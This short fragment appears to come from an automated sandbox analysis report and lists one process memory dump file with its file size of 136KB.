                • memory/4984-1-0x0000026235960000-0x0000026235982000-memory.dmp

                  Filesize

                  136KB